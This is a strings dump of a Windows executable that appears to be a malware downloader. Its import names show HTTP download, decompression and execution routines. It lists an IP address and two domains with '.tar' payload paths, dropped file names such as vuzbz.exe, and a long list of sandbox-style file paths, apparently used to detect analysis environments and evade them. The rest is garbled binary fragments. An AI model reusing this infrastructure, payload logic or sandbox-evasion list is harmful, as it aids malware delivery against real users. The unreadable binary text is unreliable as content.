L!This is a PE executable
`.rdata
u3fdXW3
PU`XUl/3
SfEfRf
P-fSfPfX
0f3/f3f
WVP}3/fEU3
fl3fft
fupX:tWf4
UW3%fuf
3QQQQP
XWVU^_VW3P
Nu3VVVj
UE3QQj
RUZE@E;xu3HEE@;xu
VVjPEUUPu(
QVVVVW
E3Eu}t
QVuWu0
)EEt)Iu
EPE+Pu
VEP}tWh
f=MZt&E
E3PEPutW
ukeu*u=uo5uG]u)uRua
CloseHandle
CreateFileW
DeleteFileW
ExitProcess
GetComputerNameW
GetCurrentDirectoryW
GetFileSize
GetModuleFileNameW
GetTempPathW
GetVersionExW
ReadFile
WriteFile
lstrlenW
lstrcmpW
SleepEx
VirtualAlloc
kernel32.dll
HttpOpenRequestW
HttpSendRequestW
InternetOpenW
InternetConnectW
InternetCloseHandle
InternetReadFile
wininet.dll
ShellExecuteW
shell32.dll
RtlDecompressBuffer
swprintf
ntdll.dll
text/*
application/*
2608cw-2
vuzbz.exe
94.23.0.200
crynz.exe
388cent.com
/test/test.tar
tatianacarrental.com
/tatianatest/images/test.tar
2608inst
C : \ U s e r s \ a d m i n \ D o w n l o a d s \ i m p o r t a n t _ d o c u m e n t . e x e
C : \ U s e r s \ J o e C a g e \ D e s k t o p \ Y f Y M u r Q H 8 5 . e x e
C : \ D o c u m e n t s a n d S e t t i n g s \ A d m i n i s t r a t o r \ D e s k t o p \ x 1 Y H x r a W . e x e
C : \ U s e r s \ a d m i n \ D o w n l o a d s \ 7 0 7 4 1 4 f d 2 7 5 d 8 b d b 0 8 1 e f 9 2 6 a 5 1 e c 4 b 0 b 6 e 7 5 b 3 8 9 7 3 f 5 8 e 2 f 2 a 1 f a b 6 c 4 3 8 1 5 a f . e x e
C : \ 1 8 d d 3 d e 6 e e f 1 9 1 3 d 7 f 6 6 0 9 5 8 d 4 2 7 c a 0 6 b b d 1 9 7 3 7 b a 6 6 1 4 4 c 8 8 b 8 e 8 b e 4 6 c 4 2 9 2 1
C : \ U s e r s \ a d m i n \ D o w n l o a d s \ v u z b z . e x e
C : \ c 8 d 6 a 9 d 9 1 6 a c 0 8 2 5 4 0 8 b a 8 2 a d f 5 4 d 9 c c 9 3 2 c 6 8 8 3 4 c f c 9 2 9 e 1 f 6 e 3 1 7 7 1 1 e 8 d 9 9 2
C : \ 8 8 d b 4 0 4 c 6 4 2 3 a 6 7 6 6 3 d 8 a 4 8 9 e 0 4 5 d d 0 a 3 3 4 3 2 3 d d 0 2 8 a 6 8 4 a 7 3 1 1 0 9 9 d 5 a 8 5 a 2 9 3
C : \ U s e r s \ a d m i n \ D o w n l o a d s \ v u z b z . e x e
C : \ 7 6 6 e 1 d d f 7 4 c 3 7 8 b e 4 1 3 6 c c c 6 2 3 3 5 8 8 5 e 3 f 6 9 5 2 6 2 6 b d 1 1 5 c 3 5 f 0 3 5 f 2 4 f f 3 e f 3 0 e
C : \ 5 5 7 5 8 c b 6 a 4 4 5 e 3 8 1 c 3 0 2 4 1 7 5 3 e 5 3 f 2 9 e 4 1 2 a 4 e 7 e 0 5 0 a 3 c 8 3 f f 7 6 3 5 f 9 2 5 0 f d 8 d 5
C : \ 1 8 a f 8 5 c 5 3 0 5 b 9 7 2 6 9 8 d e 7 e 1 6 2 6 0 8 1 5 e c f 3 6 1 b 2 0 5 b 7 b e 4 b f e c 5 1 a 6 6 b 4 7 7 4 b 7 e e f
C : \ U s e r s \ a d m i n \ D o w n l o a d s \ v u z b z . e x e
C : \ b 1 2 b 1 2 a f a 9 7 1 6 d 3 4 7 6 2 1 f b e e 2 a c a c e b 1 9 c 8 9 9 f 3 a 0 d c b c e 9 b f 2 a 9 f 1 d a 0 6 b 1 4 a 9 2
C : \ D o c u m e n t s a n d S e t t i n g s \ A d m i n i s t r a t o r \ D e s k t o p \ p e y p c z C G . e x e
C : \ 5 4 a 0 0 c 1 e 1 7 2 a 2 9 4 f e 1 5 2 0 0 9 4 6 3 c f 5 8 9 5 e 1 3 6 5 6 a 3 6 1 b 1 0 d 9 6 2 0 a 2 5 b 8 0 b e 6 a 1 7 6 9
C : \ U s e r s \ P e t r a \ A p p D a t a \ L o c a l \ T e m p \ v u z b z . p e 3 2
C : \ D o c u m e n t s a n d S e t t i n g s \ A d m i n i s t r a t o r \ D e s k t o p \ T I N d L 7 i 1 . e x e
C : \ U s e r s \ a d m i n \ D o w n l o a d s \ 5 c 8 8 4 5 1 0 7 7 8 d 6 f c 6 2 9 6 9 e 1 9 e 4 8 6 8 1 c d e 6 f 4 f 5 1 b b d 4 8 5 9 e e 3 1 9 f 1 7 5 a 5 6 e 4 0 a 6 8 b . e x e
C : \ 2 c d b b d 8 9 9 9 1 a b 2 1 a e 3 d c 5 9 0 8 5 f 9 2 d 4 c e a e d 2 5 7 d d 3 4 b 3 c 2 3 7 2 b 7 1 c 3 3 2 8 7 e 2 6 4 3 f
C : \ U s e r s \ a d m i n \ D o w n l o a d s \ v u z b z . e x e
C : \ d d 2 7 9 6 5 6 b 7 d 0 f b 1 a e 2 f 8 a 5 f c 1 3 e 3 e 9 4 0 0 5 0 0 e 6 b 2 c 8 f b 3 0 4 9 e 9 a 3 5 2 7 7 2 d e c 9 1 2 a
C : \ d f c b b 8 9 5 3 1 e 3 9 5 c c 7 0 1 4 8 7 2 f b 2 f f 3 f 4 d 9 3 1 f e d 9 c 5 3 c 9 2 8 f 5 9 2 e 2 c e 9 4 b d a 4 b 5 4 2
C : \ U s e r s \ P e t r a \ A p p D a t a \ L o c a l \ T e m p \ v u z b z . p e 3 2
C : \ U s e r s \ a d m i n \ D o w n l o a d s \ 7 4 0 d 9 6 7 b 3 2 b a 2 5 9 d _ v u z b z . e x e
C : \ d 1 9 7 2 d 5 3 3 6 c c 4 0 7 c d a e e f d 1 e 4 a b 4 a 6 d 9 3 b e a 6 5 7 9 2 4 4 e e b 8 0 5 d 5 9 3 5 5 6 7 0 4 1 1 6 d 7
C : \ U s e r s \ a d m i n \ D o w n l o a d s \ v u z b z . e x e
C : \ U s e r s \ P e t r a \ A p p D a t a \ L o c a l \ T e m p \ v u z b z . p e 3 2
C : \ 1 1 c 6 8 5 9 3 5 e 0 0 c 4 a 2 0 2 0 a 0 0 b a 6 0 d e 9 3 a 2 f 8 2 4 1 6 8 f 4 1 5 2 c 6 2 b 0 5 c b 0 1 f 6 a d c c 5 c 9 0
C : \ c 6 e c 4 5 e 1 d 6 b 1 e 3 a f 3 2 2 0 b a f d 8 f 7 2 a 3 3 3 e 4 c 0 7 e 3 4 1 5 6 b b e 5 e c 1 2 a b d 3 5 1 5 9 c 9 8 1 b
C : \ d 0 6 9 d 9 7 b c 2 5 b c 9 8 4 f d e 2 0 d f 6 4 9 d 2 0 d 4 e 1 8 2 5 7 f 0 f d b 5 a 7 2 e f a 4 b 2 b 3 f 2 e 8 3 a a 2 6 d
C : \ U s e r s \ a d m i n \ D o w n l o a d s \ v u z b z . e x e
C : \ 0 d a 3 9 6 f 6 b a c 8 f 1 b c d a 7 f 9 d f 4 6 c 5 1 7 7 c 5 b c 2 1 7 f 7 8 8 4 4 f 3 b c b 1 5 8 8 e b 9 2 3 d d 4 b 0 7 2
C : \ 3 5 4 d 8 f f d 2 1 c 7 5 d 2 1 2 1 c d f 9 7 e 3 2 0 e 8 1 f b 1 8 d a 6 8 c 6 c 3 f f b 0 8 d 4 7 2 7 0 0 5 c b 0 e 9 8 a d 9
C : \ 9 9 0 3 a c 5 9 5 9 7 b 2 8 e 7 9 9 1 4 b 0 1 2 e 4 2 0 e a c 5 d b 8 0 b 2 e 3 1 7 0 3 9 f 1 6 4 3 2 8 9 9 5 2 5 2 7 6 1 5 f 0
C : \ U s e r s \ a d m i n \ D o w n l o a d s \ v u z b z . e x e
C : \ 0 a 2 9 d a 0 0 0 3 4 4 f 8 5 7 2 1 9 d 6 7 f e c d 0 c 6 0 f 6 f 6 f d 0 6 2 f 4 d 5 b c c c 1 5 f d a 2 2 4 3 a 2 5 f f f 4 8
C : \ 0 2 8 6 0 c 4 3 e d 0 a 8 2 4 8 4 c e 2 2 1 b c e 5 6 5 9 9 d a 7 1 3 b 5 a 6 7 6 8 a 7 4 a 3 1 c 5 d c 8 6 4 2 4 7 0 4 f b 7 4
C : \ D o c u m e n t s a n d S e t t i n g s \ A d m i n i s t r a t o r \ D e s k t o p \ 9 M A z 2 3 1 D . e x e
C : \ 6 7 4 6 f 9 d 2 2 a f 2 1 7 d c 9 6 0 6 5 6 3 9 c c d f b c 0 a 8 c 8 6 a b 0 3 6 e 6 a c 4 7 2 2 e 3 8 9 d 7 4 a 9 8 2 0 5 9 5
C : \ U s e r s \ a d m i n \ D o w n l o a d s \ v u z b z . e x e
C : \ c 3 2 a 2 7 1 5 0 7 f a 4 4 0 2 e 5 a b 1 9 5 9 5 a 0 6 4 7 2 5 c 6 c c 0 a 8 5 7 6 8 d 0 7 1 e 8 8 9 a b 9 c 3 f 3 d b 7 a 2 e
C : \ D o c u m e n t s a n d S e t t i n g s \ A d m i n i s t r a t o r \ D e s k t o p \ f a j 9 V e G Y . e x e
C : \ U s e r s \ a d m i n \ D o w n l o a d s \ d 8 d 0 5 9 3 6 3 b 9 2 a d 5 1 1 f 0 0 d e 5 7 b 7 a c d 1 6 2 4 8 1 5 d c 4 f 9 1 f 9 8 b 9 0 f a 4 9 9 4 7 5 e 5 f 7 9 c e 9 . e x e
C : \ 3 0 8 f 9 b c f e 5 f 5 7 a d 5 9 5 a 9 0 b 9 b d 8 7 9 3 e 0 6 0 1 b d e 3 b d d 5 7 f 3 b 5 a 0 b 4 1 5 9 0 2 7 3 f 5 9 a c e
C : \ 2 e a b 8 a 5 a 7 c 7 a c 5 c e e 5 e 8 6 f 9 5 3 4 5 2 0 5 c 4 7 b 1 0 d 7 e 6 4 6 f a 1 0 2 8 3 c 8 b 5 e 6 7 2 0 1 f 1 6 7 3